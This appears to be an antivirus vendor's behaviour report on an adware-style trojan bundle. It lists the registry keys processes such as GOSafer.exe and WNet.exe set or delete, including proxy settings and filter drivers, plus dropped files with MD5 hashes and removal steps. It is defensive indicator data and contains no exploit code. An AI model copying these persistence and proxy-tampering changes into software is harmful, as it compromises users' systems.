[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
The process g3CvT78vSMa0N0LPai7Qvtg3CvT78vSMa0N0LPai7Qvt_ps.exe:3268 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "EA F1 08 62 9A 83 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "2C 3C 44 64 9A 83 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 48 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process amisetup2899__9664.exe:3368 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1430290658"
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0\0\win32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amisetup2899__9664.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKCR\Wow6432Node\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\TypeLib]
"(Default)" = "{1CEE7E9E-B36C-4404-8341-EACC6687DA52}"
[HKCR\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\TypeLib]
"Version" = "1.0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionTime" = "33 5F AA 66 9A 83 D0 01"
[HKCR\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\TypeLib]
"(Default)" = "{1CEE7E9E-B36C-4404-8341-EACC6687DA52}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\Version]
"(Default)" = "1.0"
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0]
"(Default)" = "InstallerLib"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "2C 3C 44 64 9A 83 D0 01"
[HKCR\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}]
"(Default)" = "Inst Class"
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\ProgID]
"(Default)" = "scalawag.wuther.1"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "amisetup2899__9664.exe"
[HKCR\scalawag.wuther\CurVer]
"(Default)" = "scalawag.wuther.1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\LocalServer32]
"ServerExecutable" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amisetup2899__9664.exe"
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0\HELPDIR]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp"
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\TypeLib]
"(Default)" = "{1cee7e9e-b36c-4404-8341-eacc6687da52}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 49 00 00 00 09 00 00 00 00 00 00 00"
[HKCR\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}]
"(Default)" = "IBoot"
[HKCR\scalawag.wuther.1\CLSID]
"(Default)" = "{c8c02f46-c416-4092-a52c-abb5232cb4b9}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
[HKCR\scalawag.wuther]
"(Default)" = "Inst Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\LocalServer32]
"(Default)" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\amisetup2899__9664.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
[HKCR\Wow6432Node\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}]
"(Default)" = "IBoot"
[HKCR\Wow6432Node\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\VersionIndependentProgID]
"(Default)" = "scalawag.wuther"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKCR\Wow6432Node\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\TypeLib]
"Version" = "1.0"
[HKCR\scalawag.wuther.1]
"(Default)" = "Inst Class"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following registry key(s):
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\Version]
[HKCR\scalawag.wuther\CurVer]
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\VersionIndependentProgID]
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0\FLAGS]
[HKCR\scalawag.wuther.1\CLSID]
[HKCR\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\ProxyStubClsid32]
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0\0]
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}]
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}]
[HKCR\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\TypeLib]
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0\0\win32]
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\Programmable]
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\TypeLib]
[HKCR\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}]
[HKCR\scalawag.wuther.1]
[HKCR\scalawag.wuther]
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0\HELPDIR]
[HKCR\Wow6432Node\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\TypeLib]
[HKCR\Wow6432Node\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}\ProxyStubClsid32]
[HKCR\Wow6432Node\Interface\{30ED611B-AC53-4142-8DEE-A6D196EB4A65}]
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\LocalServer32]
[HKCR\TypeLib\{1CEE7E9E-B36C-4404-8341-EACC6687DA52}\1.0]
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\ProgID]
The Trojan deletes the following value(s) in the system registry:
[HKCR\Wow6432Node\CLSID\{c8c02f46-c416-4092-a52c-abb5232cb4b9}\LocalServer32]
"ServerExecutable"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process GOSafer.exe:3284 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKLM\System\CurrentControlSet\Services\gosaferdrv]
"Tag" = "17"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 06 00 00 00 09 00 00 00 00 00 00 00"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "21 B7 48 6B 9A 83 D0 01"
[HKLM\SOFTWARE\GOSafer]
"instid" = "OuKz1Yi6BxlXdCQ8IZpYGGBgz2TyMvRv"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "10 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\System\CurrentControlSet\Services\Tcpip6\Parameters]
"DisabledComponents" = "142"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
"WpadDetectedUrl" = ""
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "1E 4E AA 68 9A 83 D0 01"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in the system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoDetect"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
The process WNet.exe:3080 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 05 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\ssfilterdrv]
"Tag" = "13"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "22 FE 3B 6A 9A 83 D0 01"
[HKLM\SOFTWARE\WNet]
"instid" = "XjbAXMdlReRSpd1DDxs3QmrHlGV9Q488"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "0C 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "46 00 00 00 05 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services\Tcpip6\Parameters]
"DisabledComponents" = "142"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
"WpadDetectedUrl" = ""
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "1E 4E AA 68 9A 83 D0 01"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in the system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoDetect"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
The process 310714_is.exe:948 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "25 CC 85 1E BF 72 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadNetworkName" = "Network 4"
"WpadDecisionTime" = "EA F1 08 62 9A 83 D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecisionReason" = "1"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer]
"GlobalAssocChangedCounter" = "35"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 45 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDecision" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecision" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in the system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{AAB62F56-1F12-4B3C-A0EE-A1324874AB51}]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFavoritesInitialSelection"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFeedsInitialSelection"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
Dropped PE files
MD5 | File path |
---|---|
cd594b7e64bbb60804076c1434a1ec09 | c:\Program Files (x86)\ActSys\ActSys.exe |
d6f19bc6d4f54dfae1a4d4b96d12f1c1 | c:\Program Files (x86)\ActSys\ProtocolFilters.dll |
bec584303ce252396a3731ce5bdcf03a | c:\Program Files (x86)\ActSys\libeay32.dll |
d8305b5c2810e2e135f87bb32d62810e | c:\Program Files (x86)\ActSys\nfapi.dll |
01b5780505301ada6dc102fb77b2298c | c:\Program Files (x86)\ActSys\nfregdrv.exe |
f40cddc932f47b3e406d0c4fde03dfd8 | c:\Program Files (x86)\ActSys\remove_ActSys.exe |
da6f5524c9e5b5804dc5117022d08331 | c:\Program Files (x86)\ActSys\ssleay32.dll |
84887ac0f5fde399c83b3bc5a7aaf097 | c:\Program Files (x86)\CashReminder\CashReminder.exe |
d68a76ab1ebbbdde37bb12bd68b1639d | c:\Program Files (x86)\CashReminder\ProtocolFilters.dll |
bec584303ce252396a3731ce5bdcf03a | c:\Program Files (x86)\CashReminder\libeay32.dll |
d8305b5c2810e2e135f87bb32d62810e | c:\Program Files (x86)\CashReminder\nfapi.dll |
01b5780505301ada6dc102fb77b2298c | c:\Program Files (x86)\CashReminder\nfregdrv.exe |
da6f5524c9e5b5804dc5117022d08331 | c:\Program Files (x86)\CashReminder\ssleay32.dll |
f2f4090a44f85db92f9ec40483c7e502 | c:\Program Files (x86)\CashReminder\uninstall.exe |
45c9d00b83bcafd991f95eeac6097b7f | c:\Program Files (x86)\DesProtetor\DesProtetor.exe |
9a0c59099f8589ee0f026bcd42c06800 | c:\Program Files (x86)\DesProtetor\ProtocolFilters.dll |
3e1176c39139baf084e9a69d6d50438a | c:\Program Files (x86)\DesProtetor\libeay32.dll |
0e2ca4f2d3f113f006d5801319a626de | c:\Program Files (x86)\DesProtetor\nfapi.dll |
92a6df47283b49b207045fa7a4502bc1 | c:\Program Files (x86)\DesProtetor\nfregdrv.exe |
4fbf0e0dd471ce2945c33c14e14269ff | c:\Program Files (x86)\DesProtetor\ssleay32.dll |
28ca54fa79bb30e8eef8ebd5053ee746 | c:\Program Files (x86)\DesProtetor\uninst.exe |
9a0c59099f8589ee0f026bcd42c06800 | c:\Program Files (x86)\GOSafer\ProtocolFilters.dll |
c1908176b417b29dcfcfc15d7de9de63 | c:\Program Files (x86)\GOSafer\gosafer.exe |
3e1176c39139baf084e9a69d6d50438a | c:\Program Files (x86)\GOSafer\libeay32.dll |
0e2ca4f2d3f113f006d5801319a626de | c:\Program Files (x86)\GOSafer\nfapi.dll |
92a6df47283b49b207045fa7a4502bc1 | c:\Program Files (x86)\GOSafer\nfregdrv.exe |
4fbf0e0dd471ce2945c33c14e14269ff | c:\Program Files (x86)\GOSafer\ssleay32.dll |
9d37509b72dc3143feffc3f1977c9d7d | c:\Program Files (x86)\GOSafer\uninst.exe |
9a0c59099f8589ee0f026bcd42c06800 | c:\Program Files (x86)\WNet\ProtocolFilters.dll |
45571677457a9bfd49aadada0fd91ca8 | c:\Program Files (x86)\WNet\WNet.exe |
3e1176c39139baf084e9a69d6d50438a | c:\Program Files (x86)\WNet\libeay32.dll |
8249371485714e1f45a4b1c67002cf47 | c:\Program Files (x86)\WNet\nfapi.dll |
92a6df47283b49b207045fa7a4502bc1 | c:\Program Files (x86)\WNet\nfregdrv.exe |
4fbf0e0dd471ce2945c33c14e14269ff | c:\Program Files (x86)\WNet\ssleay32.dll |
6200d767a099a1744e99abae47958a42 | c:\Program Files (x86)\WNet\uninst.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Program Files% (x86)\XTab\web\_locales\it-CH\messages.json (3 bytes)
%Program Files% (x86)\XTab\ProtectService.exe (5469 bytes)
%Program Files% (x86)\XTab\web\js\js.js (18 bytes)
%Program Files% (x86)\XTab\skin\logo.png (5 bytes)
%Program Files% (x86)\XTab\web\js\xagainit2.0.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsn5B4A.tmp\System.dll (23 bytes)
%Program Files% (x86)\XTab\web\main.css (19 bytes)
%Program Files% (x86)\XTab\web\_locales\vi-VI\messages.json (4 bytes)
%Program Files% (x86)\XTab\web\_locales\ru\messages.json (4 bytes)
%Program Files% (x86)\XTab\skin\close.png (3 bytes)
%Program Files% (x86)\XTab\web\data.html (20 bytes)
%Program Files% (x86)\XTab\web\img\logo32.ico (4 bytes)
%Program Files% (x86)\XTab\web\img\icon128.png (9 bytes)
%Program Files% (x86)\XTab\web\js\jquery.autocomplete.js (12 bytes)
%Program Files% (x86)\XTab\skin\about.png (4 bytes)
%Program Files% (x86)\XTab\BrowerWatchCH.dll (23 bytes)
